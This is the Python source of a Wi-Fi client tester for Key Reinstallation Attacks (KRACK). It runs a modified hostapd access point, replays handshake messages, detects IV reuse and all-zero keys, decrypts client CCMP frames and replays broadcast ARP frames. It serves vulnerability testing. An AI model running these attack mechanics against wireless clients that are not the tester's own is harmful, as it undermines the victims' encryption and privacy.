krack-test-client.py 29 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738
  1. #!/usr/bin/env python2
  2. import logging
  3. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  4. from scapy.all import *
  5. import sys, socket, struct, time, subprocess, atexit, select
  6. from datetime import datetime
  7. from wpaspy import Ctrl
  8. from Cryptodome.Cipher import AES
  9. # FIXME: We are repeating the "disable hw encryption" of FT tests
  10. USAGE = """{name} - Tool to test Key Reinstallation Attacks against clients
  11. To test wheter a client is vulnerable to Key Reinstallation Attack against
  12. the 4-way handshake or group key handshake, take the following steps:
  13. 1. Compile our modified hostapd instance. This only needs to be done once.
  14. cd ../hostapd
  15. cp defconfig .config
  16. make -j 2
  17. 2. The hardware encryption engine of some Wi-Fi NICs have bugs that interfere
  18. with our script. So disable hardware encryption by executing:
  19. cd ../krackattack/
  20. ./disable-hwcrypto.sh
  21. This only needs to be done once. It's recommended to reboot after executing
  22. this script. After plugging in your Wi-Fi NIC, use `systool -vm ath9k_htc`
  23. or similar to confirm the nohwcript/.. param has been set. We tested this
  24. script with an Intel Dual Band Wireless-AC 7260 and a TP-Link TL-WN722N.
  25. 3. Execute this script. Accepted parameters are:
  26. --group Test the group key handshake instead of the 4-way handshake
  27. --debug Show more debug messages
  28. All other supplied arguments are passed on to hostapd.
  29. The only two commands you will normally have to execute are:
  30. {name}
  31. {name} --group
  32. The first one tests for key reinstallations in the 4-way handshake (see
  33. step 4), and the second tests one for key reinstallations in the group key
  34. handshake (see step 5).
  35. !! The default network name is testnetwork with password abcdefgh !!
  36. Note that you can change settings of the AP by modifying hostapd.conf.
  37. You will probably have to edit the line `interface=` to specify a Wi-Fi
  38. interface to use for the AP.
  39. 4. To test key reinstallations in the 4-way handshake, the script will keep
  40. sending encrypted message 3's to the client. To start the script execute:
  41. {name}
  42. Connect the the AP and the following tests will be performed automatically:
  43. 4a. The script monitors traffic sent by the client to see if the pairwise
  44. key is being reinstalled. To assure the client is sending enough frames,
  45. you can optionally ping the AP: ping 192.168.100.254 .
  46. If the client is vulnerable, the script will show something like:
  47. [19:02:37] 78:31:c1:c4:88:92: IV reuse detected (IV=1, seq=10). Client is vulnerable to pairwise key reinstallations in the 4-way handshake!
  48. If the client is patched, the script will show (this can take a minute):
  49. [18:58:11] 90:18:7c:6e:6b:20: client DOESN'T seem vulnerable to pairwise key reinstallation in the 4-way handshake.
  50. 4b. Once the client has requested an IP using DHCP, the script tests for
  51. reinstallations of the group key by sending broadcast ARP requests to the
  52. client using an already used (replayed) packet number (= IV). The client
  53. *must* request an IP using DHCP for this test to start.
  54. If the client is vulnerable, the script will show something like:
  55. [19:03:08] 78:31:c1:c4:88:92: Received 5 unique replies to replayed broadcast ARP requests. Client is vulnerable to group
  56. [19:03:08] key reinstallations in the 4-way handshake (or client accepts replayed broadcast frames)!
  57. If the client is patched, the script will show (this can take a minute):
  58. [19:03:08] 78:31:c1:c4:88:92: client DOESN'T seem vulnerable to group key reinstallation in the 4-way handshake handshake.
  59. Note that this scripts *indirectly* tests for reinstallations of the group
  60. key, by testing if replayed broadcast frames are accepted by the client.
  61. 5. Some supplicants (e.g. wpa_supplicant v2.6) are only vulnerable to pairwise
  62. key reinstallations in the 4-way handshake when a forged message 1 is
  63. injected before sending a retransmitted message 3. To test for this variant
  64. of the attack, you can execute:
  65. {name} --tptk # Inject message 1 with a replayed ANonce
  66. {name} --tptk-rand # Inject message 1 with a random ANonce
  67. Now follow the same steps as in step 4 to see if a supplicant is vulnerable.
  68. Try both these attack variants after running the normal tests of step 4.
  69. 6. To test key reinstallations in the group key handshake, the script will keep
  70. performing new group key handshakes using an identical (static) group key.
  71. The client *must* request an IP using DHCP for this test to start. To start
  72. the script execute:
  73. {name} --group
  74. Connect the the AP and all tests will be performed automatically. The
  75. working and output of the script is now similar as in step 4b.
  76. 7. Some final recommendations:
  77. 6a. Perform these tests in a room with little interference. A high amount
  78. of packet loss will make this script unreliable!
  79. 6b. Manually inspect network traffic to confirm the output of the script:
  80. - Use an extra Wi-Fi NIC in monitor mode to check pairwise key reinstalls
  81. by monitoring the IVs of frames sent by the client.
  82. - Capture traffic on the client to see if the replayed broadcast ARP
  83. requests are accepted or not.
  84. 6c. If the client can use multiple Wi-Fi radios/NICs, test using a few
  85. different ones.
  86. """
  87. # FIXME:
  88. # - If the client installs an all-zero key, we cannot reliably test the group key handshake
  89. # - We should test decryption using an all-zero key, and warn if this seems to succeed
  90. # Future work:
  91. # - Detect if the client reinstalls an all-zero encryption key (wpa_supplicant v2.4 and 2.5)
  92. # - Ability to test the group key handshake against specific clients only
  93. # - Individual test to see if the client accepts replayed broadcast traffic (without performing key reinstallation)
  94. # After how many seconds a new message 3, or new group key message 1, is sent.
  95. # This value must match the one in `../src/ap/wpa_auth.c` (same variable name).
  96. HANDSHAKE_TRANSMIT_INTERVAL = 2
  97. #### Basic output and logging functionality ####
  98. ALL, DEBUG, INFO, STATUS, WARNING, ERROR = range(6)
  99. COLORCODES = { "gray" : "\033[0;37m",
  100. "green" : "\033[0;32m",
  101. "orange": "\033[0;33m",
  102. "red" : "\033[0;31m" }
  103. global_log_level = INFO
  104. def log(level, msg, color=None, showtime=True):
  105. if level < global_log_level: return
  106. if level == DEBUG and color is None: color="gray"
  107. if level == WARNING and color is None: color="orange"
  108. if level == ERROR and color is None: color="red"
  109. print (datetime.now().strftime('[%H:%M:%S] ') if showtime else " "*11) + COLORCODES.get(color, "") + msg + "\033[1;0m"
  110. #### Utility Commands ####
  111. def hostapd_command(hostapd_ctrl, cmd):
  112. rval = hostapd_ctrl.request(cmd)
  113. if "UNKNOWN COMMAND" in rval:
  114. log(ERROR, "Hostapd did not recognize the command %s. Did you (re)compile hostapd?" % cmd.split()[0])
  115. quit(1)
  116. return rval
  117. #### Packet Processing Functions ####
  118. class DHCP_sock(DHCP_am):
  119. def __init__(self, **kwargs):
  120. self.sock = kwargs.pop("sock")
  121. super(DHCP_am, self).__init__(**kwargs)
  122. def send_reply(self, reply):
  123. self.sock.send(reply, **self.optsend)
  124. def print_reply(self, req, reply):
  125. log(STATUS, "%s: DHCP reply %s to %s" % (reply.getlayer(Ether).dst, reply.getlayer(IP).dst, reply.dst), color="green")
  126. def remove_client(self, clientmac):
  127. clientip = self.leases[clientmac]
  128. self.pool.append(clientip)
  129. del self.leases[clientmac]
  130. class ARP_sock(ARP_am):
  131. def __init__(self, **kwargs):
  132. self.sock = kwargs.pop("sock")
  133. super(ARP_am, self).__init__(**kwargs)
  134. def send_reply(self, reply):
  135. self.sock.send(reply, **self.optsend)
  136. def print_reply(self, req, reply):
  137. log(STATUS, "%s: ARP: %s ==> %s on %s" % (reply.getlayer(Ether).dst, req.summary(), reply.summary(), self.iff))
  138. class MitmSocket(L2Socket):
  139. def __init__(self, **kwargs):
  140. super(MitmSocket, self).__init__(**kwargs)
  141. def send(self, p):
  142. # Hack: set the More Data flag so we can detect injected frames (and so clients stay awake longer)
  143. p[Dot11].FCfield |= 0x20
  144. L2Socket.send(self, RadioTap()/p)
  145. def _strip_fcs(self, p):
  146. # Scapy can't handle the optional Frame Check Sequence (FCS) field automatically
  147. if p[RadioTap].present & 2 != 0:
  148. rawframe = str(p[RadioTap])
  149. pos = 8
  150. while ord(rawframe[pos - 1]) & 0x80 != 0: pos += 4
  151. # If the TSFT field is present, it must be 8-bytes aligned
  152. if p[RadioTap].present & 1 != 0:
  153. pos += (8 - (pos % 8))
  154. pos += 8
  155. # Remove FCS if present
  156. if ord(rawframe[pos]) & 0x10 != 0:
  157. return Dot11(str(p[Dot11])[:-4])
  158. return p[Dot11]
  159. def recv(self, x=MTU):
  160. p = L2Socket.recv(self, x)
  161. if p == None or not Dot11 in p: return None
  162. # Hack: ignore frames that we just injected and are echoed back by the kernel
  163. if p[Dot11].FCfield & 0x20 != 0:
  164. return None
  165. # Strip the FCS if present, and drop the RadioTap header
  166. return self._strip_fcs(p)
  167. def close(self):
  168. super(MitmSocket, self).close()
  169. def dot11_get_seqnum(p):
  170. return p[Dot11].SC >> 4
  171. def dot11_get_iv(p):
  172. """Scapy can't handle Extended IVs, so do this properly ourselves (only works for CCMP)"""
  173. wep = p[Dot11WEP]
  174. if wep.keyid & 32:
  175. # FIXME: Only CCMP is supported (TKIP uses a different IV structure)
  176. return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (struct.unpack(">I", wep.wepdata[0:4])[0] << 16)
  177. else:
  178. return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (ord(wep.iv[2]) << 16)
  179. def dot11_get_priority(p):
  180. if not Dot11QoS in p: return 0
  181. return ord(str(p[Dot11QoS])[0])
  182. def get_ccmp_payload(p):
  183. # Extract encrypted payload:
  184. # - Skip extended IV (4 bytes in total)
  185. # - Exclude first 4 bytes of the CCMP MIC (note that last 4 are saved in the WEP ICV field)
  186. return str(p.wepdata[4:-4])
  187. def decrypt_ccmp(p, key):
  188. payload = get_ccmp_payload(p)
  189. sendermac = p[Dot11].addr2
  190. priority = dot11_get_priority(p)
  191. iv = dot11_get_iv(p)
  192. pn = struct.pack(">I", iv >> 16) + struct.pack(">H", iv & 0xFFFF)
  193. nonce = chr(priority) + sendermac.replace(':','').decode("hex") + pn
  194. cipher = AES.new(key, AES.MODE_CCM, nonce, mac_len=8)
  195. plaintext = cipher.decrypt(payload)
  196. return plaintext
  197. #### Main Testing Code ####
  198. class IvInfo():
  199. def __init__(self, p):
  200. self.iv = dot11_get_iv(p)
  201. self.seq = dot11_get_seqnum(p)
  202. self.time = p.time
  203. def is_reused(self, p):
  204. """Check if frame p reuses an IV and is not a retransmitted frame"""
  205. iv = dot11_get_iv(p)
  206. seq = dot11_get_seqnum(p)
  207. return self.iv == iv and self.seq != seq and p.time >= self.time + 1
  208. class ClientState():
  209. UNKNOWN, VULNERABLE, PATCHED = range(3)
  210. IDLE, STARTED, GOT_CANARY, FINISHED = range(4)
  211. def __init__(self, clientmac, test_group_hs=False, test_tptk=False):
  212. self.mac = clientmac
  213. self.TK = None
  214. self.vuln_4way = ClientState.UNKNOWN
  215. self.vuln_group = ClientState.UNKNOWN
  216. # FIXME: Separate variable for group handshake result?
  217. self.ivs = dict() # maps IV values to IvInfo objects
  218. self.pairkey_sent_time_prev_iv = None
  219. self.pairkey_intervals_no_iv_reuse = 0
  220. self.pairkey_tptk = test_tptk
  221. self.groupkey_reset()
  222. self.groupkey_grouphs = test_group_hs
  223. def groupkey_reset(self):
  224. self.groupkey_state = ClientState.IDLE
  225. self.groupkey_prev_canary_time = 0
  226. self.groupkey_num_canaries = 0
  227. self.groupkey_requests_sent = 0
  228. self.groupkey_patched_intervals = -1 # -1 because the first broadcast ARP requests are still valid
  229. def start_grouphs_test():
  230. self.groupkey_reset()
  231. self.groupkey_grouphs = True
  232. def get_encryption_key(self, hostapd_ctrl):
  233. if self.TK is None:
  234. # Clear old replies and messages from the hostapd control interface
  235. while hostapd_ctrl.pending():
  236. hostapd_ctrl.recv()
  237. # Contact our modified Hostapd instance to request the pairwise key
  238. response = hostapd_command(hostapd_ctrl, "GET_TK " + self.mac)
  239. if not "FAIL" in response:
  240. self.TK = response.strip().decode("hex")
  241. return self.TK
  242. def decrypt(self, p, hostapd_ctrl):
  243. payload = get_ccmp_payload(p)
  244. llcsnap, packet = payload[:8], payload[8:]
  245. if payload.startswith("\xAA\xAA\x03\x00\x00\x00"):
  246. # On some kernels, the virtual interface associated to the real AP interface will return
  247. # frames where the payload is already decrypted (this happens when hardware decryption is
  248. # used). So if the payload seems decrypted, just extract the full plaintext from the frame.
  249. plaintext = payload
  250. else:
  251. key = self.get_encryption_key(hostapd_ctrl)
  252. plaintext = decrypt_ccmp(p, key)
  253. # If it still fails, try an all-zero key
  254. if not plaintext.startswith("\xAA\xAA\x03\x00\x00\x00"):
  255. plaintext = decrypt_ccmp(p, "\x00" * 16)
  256. return plaintext
  257. def track_used_iv(self, p):
  258. iv = dot11_get_iv(p)
  259. self.ivs[iv] = IvInfo(p)
  260. def is_iv_reused(self, p):
  261. """Returns True if this is an *observed* IV reuse and not just a retransmission"""
  262. iv = dot11_get_iv(p)
  263. return iv in self.ivs and self.ivs[iv].is_reused(p)
  264. def is_new_iv(self, p):
  265. """Returns True if the IV in this frame is higher than all previously observed ones"""
  266. iv = dot11_get_iv(p)
  267. if len(self.ivs) == 0: return True
  268. return iv > max(self.ivs.keys())
  269. def check_pairwise_reinstall(self, p):
  270. """Inspect whether the IV is reused, or whether the client seem to be patched"""
  271. # If this is gaurenteed IV reuse (and not just a benign retransmission), mark the client as vulnerable
  272. if self.is_iv_reused(p):
  273. if self.vuln_4way != ClientState.VULNERABLE:
  274. iv = dot11_get_iv(p)
  275. seq = dot11_get_seqnum(p)
  276. log(INFO, ("%s: IV reuse detected (IV=%d, seq=%d). " +
  277. "Client is vulnerable to pairwise key reinstallations in the 4-way handshake!") % (self.mac, iv, seq), color="green")
  278. self.vuln_4way = ClientState.VULNERABLE
  279. # If it's a higher IV than all previous ones, try to check if the client seems patched
  280. elif self.vuln_4way == ClientState.UNKNOWN and self.is_new_iv(p):
  281. # Save how many intervals we received a data packet without IV reset. Use twice the
  282. # transmission interval of message 3, in case one message 3 is lost due to noise.
  283. if self.pairkey_sent_time_prev_iv is None:
  284. self.pairkey_sent_time_prev_iv = p.time
  285. elif self.pairkey_sent_time_prev_iv + 2 * HANDSHAKE_TRANSMIT_INTERVAL + 1 <= p.time:
  286. self.pairkey_intervals_no_iv_reuse += 1
  287. self.pairkey_sent_time_prev_iv = p.time
  288. log(DEBUG, "%s: no pairwise IV resets seem to have occured for one interval" % self.mac)
  289. # If during several intervals all IV reset attempts failed, the client is likely patched.
  290. # We wait for enough such intervals to occur, to avoid getting a wrong result.
  291. if self.pairkey_intervals_no_iv_reuse >= 5 and self.vuln_4way == ClientState.UNKNOWN:
  292. self.vuln_4way = ClientState.PATCHED
  293. # Be sure to clarify *which* type of attack failed (to remind user to test others attacks as well)
  294. msg = "%s: client DOESN'T seem vulnerable to pairwise key reinstallation in the 4-way handshake"
  295. if self.pairkey_tptk == KRAckAttackClient.TPTK_NONE:
  296. msg += " (using standard attack)"
  297. elif self.pairkey_tptk == KRAckAttackClient.TPTK_REPLAY:
  298. msg += " (using TPTK attack)"
  299. elif self.pairkey_tptk == KRAckAttackClient.TPTK_RAND:
  300. msg += " (using TPTK-RAND attack)"
  301. log(INFO, (msg + ".") % self.mac, color="green")
  302. def mark_allzero_key(self, p):
  303. if self.vuln_4way != ClientState.VULNERABLE:
  304. iv = dot11_get_iv(p)
  305. seq = dot11_get_seqnum(p)
  306. log(INFO, ("%s: usage of all-zero key detected (IV=%d, seq=%d). " +
  307. "Client is vulnerable to installation of an all-zero key in the 4-way handshake!") % (self.mac, iv, seq), color="green")
  308. log(WARNING, "%s: !!! Other tests are unreliable due to all-zero key usage, please fix this first !!!" % self.mac)
  309. self.vuln_4way = ClientState.VULNERABLE
  310. def groupkey_handle_canary(self, p):
  311. """Handle replies to the replayed ARP broadcast request (which reuses an IV)"""
  312. # Must be testing this client, and must not be a benign retransmission
  313. if not self.groupkey_state in [ClientState.STARTED, ClientState.GOT_CANARY]: return
  314. if self.groupkey_prev_canary_time + 1 > p.time: return
  315. self.groupkey_num_canaries += 1
  316. log(DEBUG, "%s: received %d replies to the replayed broadcast ARP requests" % (self.mac, self.groupkey_num_canaries))
  317. # We wait for several replies before marking the client as vulnerable, because
  318. # the first few broadcast ARP requests still use a valid (not yet used) IV.
  319. if self.groupkey_num_canaries >= 5:
  320. assert self.vuln_group != ClientState.VULNERABLE
  321. log(INFO, "%s: Received %d unique replies to replayed broadcast ARP requests. Client is vulnerable to group" \
  322. % (self.mac, self.groupkey_num_canaries), color="green")
  323. log(INFO, " key reinstallations in the %s handshake (or client accepts replayed broadcast frames)!" \
  324. % ("group key" if self.groupkey_grouphs else "4-way"), color="green")
  325. self.vuln_group = ClientState.VULNERABLE
  326. self.groupkey_state = ClientState.FINISHED
  327. # Remember that we got a reply this interval (see groupkey_track_request to detect patched clients)
  328. else:
  329. self.groupkey_state = ClientState.GOT_CANARY
  330. self.groupkey_prev_canary_time = p.time
  331. def groupkey_track_request(self):
  332. """Track when we went broadcast ARP requests, and determine if a client seems patched"""
  333. if self.vuln_group != ClientState.UNKNOWN: return
  334. hstype = "group key" if self.groupkey_grouphs else "4-way"
  335. # Show a message when we started with testing the client
  336. if self.groupkey_state == ClientState.IDLE:
  337. log(STATUS, "%s: client has IP address -> testing for group key reinstallation in the %s handshake" % (self.mac, hstype))
  338. self.groupkey_state = ClientState.STARTED
  339. if self.groupkey_requests_sent == 4:
  340. # We sent four broadcast ARP requests, and at least one got a reply. Indication that client is vulnerable.
  341. if self.groupkey_state == ClientState.GOT_CANARY:
  342. log(DEBUG, "%s: got a reply to broadcast ARP during this interval" % self.mac)
  343. self.groupkey_state = ClientState.STARTED
  344. # We sent four broadcast ARP requests, and didn't get a reply to any. Indication that client is patched.
  345. elif self.groupkey_state == ClientState.STARTED:
  346. self.groupkey_patched_intervals += 1
  347. log(DEBUG, "%s: no group IV resets seem to have occured for %d interval(s)" % (self.mac, self.groupkey_patched_intervals))
  348. self.groupkey_state = ClientState.STARTED
  349. self.groupkey_requests_sent = 0
  350. # If the client appears secure for several intervals (see above), it's likely patched
  351. if self.groupkey_patched_intervals >= 5 and self.vuln_group == ClientState.UNKNOWN:
  352. log(INFO, "%s: client DOESN'T seem vulnerable to group key reinstallation in the %s handshake." % (self.mac, hstype), color="green")
  353. self.vuln_group = ClientState.PATCHED
  354. self.groupkey_state = ClientState.FINISHED
  355. self.groupkey_requests_sent += 1
  356. log(DEBUG, "%s: sent %d broadcasts ARPs this interval" % (self.mac, self.groupkey_requests_sent))
  357. class KRAckAttackClient():
  358. TPTK_NONE, TPTK_REPLAY, TPTK_RAND = range(3)
  359. def __init__(self, interface):
  360. self.nic_iface = interface
  361. self.nic_mon = interface + "mon"
  362. self.test_grouphs = False
  363. self.test_tptk = KRAckAttackClient.TPTK_NONE
  364. try:
  365. self.apmac = scapy.arch.get_if_hwaddr(interface)
  366. except:
  367. log(ERROR, 'Failed to get MAC address of %s. Specify an existing interface in hostapd.conf at the line "interface=NAME".' % interface)
  368. raise
  369. self.sock_mon = None
  370. self.sock_eth = None
  371. self.hostapd = None
  372. self.hostapd_ctrl = None
  373. self.dhcp = None
  374. self.group_ip = None
  375. self.group_arp = None
  376. self.clients = dict()
  377. def reset_client_info(self, clientmac):
  378. if clientmac in self.dhcp.leases:
  379. self.dhcp.remove_client(clientmac)
  380. log(DEBUG, "%s: Removing client from DHCP leases" % clientmac)
  381. if clientmac in self.clients:
  382. del self.clients[clientmac]
  383. log(DEBUG, "%s: Removing ClientState object" % clientmac)
  384. def handle_replay(self, p):
  385. """Replayed frames (caused by a pairwise key reinstallation) are rejected by the kernel. This
  386. function processes these frames manually so we can still test reinstallations of the group key."""
  387. if not Dot11WEP in p: return
  388. # Reconstruct Ethernet header
  389. clientmac = p.addr2
  390. header = Ether(dst=self.apmac, src=clientmac)
  391. header.time = p.time
  392. # Decrypt the payload and obtain LLC/SNAP header and packet content
  393. client = self.clients[clientmac]
  394. plaintext = client.decrypt(p, self.hostapd_ctrl)
  395. llcsnap, packet = plaintext[:8], plaintext[8:]
  396. # Rebuild the full Ethernet packet
  397. if llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x06":
  398. decap = header/ARP(packet)
  399. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x00":
  400. decap = header/IP(packet)
  401. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x86\xdd":
  402. decap = header/IPv6(packet)
  403. #elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x88\x8e":
  404. # # EAPOL
  405. else:
  406. return
  407. # Now process the packet as if it were a valid (non-replayed) one
  408. self.process_eth_rx(decap)
  409. def handle_mon_rx(self):
  410. p = self.sock_mon.recv()
  411. if p == None: return
  412. if p.type == 1: return
  413. # Note: we cannot verify that the NIC is indeed reusing IVs when sending the broadcast
  414. # ARP requests, because it may override them in the firmware/hardware (some Atheros
  415. # Wi-Fi NICs do no properly reset the Tx group key IV when using hardware encryption).
  416. # The first bit in FCfield is set if the frames is "to-DS"
  417. clientmac, apmac = (p.addr1, p.addr2) if (p.FCfield & 2) != 0 else (p.addr2, p.addr1)
  418. if apmac != self.apmac: return None
  419. # Reset info about disconnected clients
  420. if Dot11Deauth in p or Dot11Disas in p:
  421. self.reset_client_info(clientmac)
  422. # Inspect encrypt frames for IV reuse & handle replayed frames rejected by the kernel
  423. elif p.addr1 == self.apmac and Dot11WEP in p:
  424. if not clientmac in self.clients:
  425. self.clients[clientmac] = ClientState(clientmac, test_group_hs=self.test_grouphs, test_tptk=self.test_tptk)
  426. client = self.clients[clientmac]
  427. iv = dot11_get_iv(p)
  428. log(DEBUG, "%s: transmitted data using IV=%d (seq=%d)" % (clientmac, iv, dot11_get_seqnum(p)))
  429. if decrypt_ccmp(p, "\x00" * 16).startswith("\xAA\xAA\x03\x00\x00\x00"):
  430. client.mark_allzero_key(p)
  431. if not self.test_grouphs:
  432. client.check_pairwise_reinstall(p)
  433. if client.is_iv_reused(p):
  434. self.handle_replay(p)
  435. client.track_used_iv(p)
  436. def process_eth_rx(self, p):
  437. self.dhcp.reply(p)
  438. self.group_arp.reply(p)
  439. clientmac = p[Ether].src
  440. if not clientmac in self.clients: return
  441. client = self.clients[clientmac]
  442. if ARP in p and p[ARP].pdst == self.group_ip:
  443. client.groupkey_handle_canary(p)
  444. def handle_eth_rx(self):
  445. p = self.sock_eth.recv()
  446. if p == None or not Ether in p: return
  447. self.process_eth_rx(p)
  448. def configure_interfaces(self):
  449. log(STATUS, "Note: disable Wi-Fi in network manager & disable hardware encryption. Both may interfere with this script.")
  450. # 0. Some users may forget this otherwise
  451. subprocess.check_output(["rfkill", "unblock", "wifi"])
  452. # 1. Remove unused virtual interfaces to start from a clean state
  453. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  454. # 2. Configure monitor mode on interfaces
  455. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  456. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  457. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  458. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  459. time.sleep(0.5)
  460. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  461. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  462. def run(self, test_grouphs=False, test_tptk=False):
  463. self.configure_interfaces()
  464. # Open the patched hostapd instance that carries out tests and let it start
  465. log(STATUS, "Starting hostapd ...")
  466. self.hostapd = subprocess.Popen(["../hostapd/hostapd", "hostapd.conf"] + sys.argv[1:])
  467. time.sleep(1)
  468. try:
  469. self.hostapd_ctrl = Ctrl("hostapd_ctrl/" + self.nic_iface)
  470. self.hostapd_ctrl.attach()
  471. except:
  472. log(ERROR, "It seems hostapd did not start properly, please inspect its output.")
  473. log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise hostapd won't work.")
  474. raise
  475. self.sock_mon = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  476. self.sock_eth = L2Socket(type=ETH_P_ALL, iface=self.nic_iface)
  477. # Let scapy handle DHCP requests
  478. self.dhcp = DHCP_sock(sock=self.sock_eth,
  479. domain='krackattack.com',
  480. pool=Net('192.168.100.0/24'),
  481. network='192.168.100.0/24',
  482. gw='192.168.100.254',
  483. renewal_time=600, lease_time=3600)
  484. # Configure gateway IP: reply to ARP and ping requests
  485. subprocess.check_output(["ifconfig", self.nic_iface, "192.168.100.254"])
  486. # Use a dedicated IP address for our broadcast ARP requests and replies
  487. self.group_ip = self.dhcp.pool.pop()
  488. self.group_arp = ARP_sock(sock=self.sock_eth, IP_addr=self.group_ip, ARP_addr=self.apmac)
  489. # If applicable, inform hostapd that we are testing the group key handshake
  490. if test_grouphs:
  491. hostapd_command(self.hostapd_ctrl, "START_GROUP_TESTS")
  492. self.test_grouphs = True
  493. # If applicable, inform hostapd that we are testing for Temporal PTK (TPTK) construction behaviour
  494. self.test_tptk = test_tptk
  495. if self.test_tptk == KRAckAttackClient.TPTK_REPLAY:
  496. hostapd_command(self.hostapd_ctrl, "TEST_TPTK")
  497. elif self.test_tptk == KRAckAttackClient.TPTK_RAND:
  498. hostapd_command(self.hostapd_ctrl, "TEST_TPTK_RAND")
  499. log(STATUS, "Ready. Connect to this Access Point to start the tests. Make sure the client requests an IP using DHCP!", color="green")
  500. # Monitor both the normal interface and virtual monitor interface of the AP
  501. self.next_arp = time.time() + 1
  502. while True:
  503. sel = select.select([self.sock_mon, self.sock_eth], [], [], 1)
  504. if self.sock_mon in sel[0]: self.handle_mon_rx()
  505. if self.sock_eth in sel[0]: self.handle_eth_rx()
  506. # Periodically send the replayed broadcast ARP requests to test for group key reinstallations
  507. if time.time() > self.next_arp:
  508. self.next_arp = time.time() + HANDSHAKE_TRANSMIT_INTERVAL
  509. for client in self.clients.values():
  510. # Also keep injecting to PATCHED clients (just to be sure they keep rejecting replayed frames)
  511. if client.vuln_group != ClientState.VULNERABLE and client.mac in self.dhcp.leases:
  512. clientip = self.dhcp.leases[client.mac]
  513. client.groupkey_track_request()
  514. log(INFO, "%s: sending broadcast ARP to %s from %s" % (client.mac, clientip, self.group_ip))
  515. request = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.group_ip, pdst=clientip)
  516. self.sock_eth.send(request)
  517. def stop(self):
  518. log(STATUS, "Closing hostapd and cleaning up ...")
  519. if self.hostapd:
  520. self.hostapd.terminate()
  521. self.hostapd.wait()
  522. if self.sock_mon: self.sock_mon.close()
  523. if self.sock_eth: self.sock_eth.close()
  524. def cleanup():
  525. attack.stop()
  526. def argv_get_interface():
  527. for i in range(len(sys.argv)):
  528. if not sys.argv[i].startswith("-i"):
  529. continue
  530. if len(sys.argv[i]) > 2:
  531. return sys.argv[i][2:]
  532. else:
  533. return sys.argv[i + 1]
  534. return None
  535. def argv_pop_argument(argument):
  536. if not argument in sys.argv: return False
  537. idx = sys.argv.index(argument)
  538. del sys.argv[idx]
  539. return True
  540. def hostapd_read_config(config):
  541. # Read the config, get the interface name, and verify some settings.
  542. interface = None
  543. with open(config) as fp:
  544. for line in fp.readlines():
  545. line = line.strip()
  546. if line.startswith("interface="):
  547. interface = line.split('=')[1]
  548. elif line.startswith("wpa_pairwise=") or line.startswith("rsn_pairwise"):
  549. if "TKIP" in line:
  550. log(ERROR, "ERROR: We only support tests using CCMP. Only include CCMP in %s config at the following line:" % config)
  551. log(ERROR, " >%s<" % line, showtime=False)
  552. quit(1)
  553. # Parameter -i overrides interface in config.
  554. # FIXME: Display warning when multiple interfaces are used.
  555. if argv_get_interface() is not None:
  556. interface = argv_get_interface()
  557. return interface
  558. if __name__ == "__main__":
  559. if "--help" in sys.argv or "-h" in sys.argv:
  560. print USAGE.format(name=sys.argv[0])
  561. quit(1)
  562. test_grouphs = argv_pop_argument("--group")
  563. test_tptk_replay = argv_pop_argument("--tptk")
  564. test_tptk_rand = argv_pop_argument("--tptk-rand")
  565. while argv_pop_argument("--debug"):
  566. global_log_level -= 1
  567. test_tptk = KRAckAttackClient.TPTK_NONE
  568. if test_tptk_replay and test_tptk_rand:
  569. log(ERROR, "Please only specify --tptk or --tptk-rand")
  570. elif test_tptk_replay:
  571. test_tptk = KRAckAttackClient.TPTK_REPLAY
  572. elif test_tptk_rand:
  573. test_tptk = KRAckAttackClient.TPTK_RAND
  574. try:
  575. interface = hostapd_read_config("hostapd.conf")
  576. except Exception as ex:
  577. log(ERROR, "Failed to parse the hostapd.conf config file")
  578. raise
  579. if not interface:
  580. log(ERROR, "Failed to determine wireless interface. Specify one in the hostapd config file.")
  581. quit(1)
  582. attack = KRAckAttackClient(interface)
  583. atexit.register(cleanup)
  584. attack.run(test_grouphs=test_grouphs, test_tptk=test_tptk)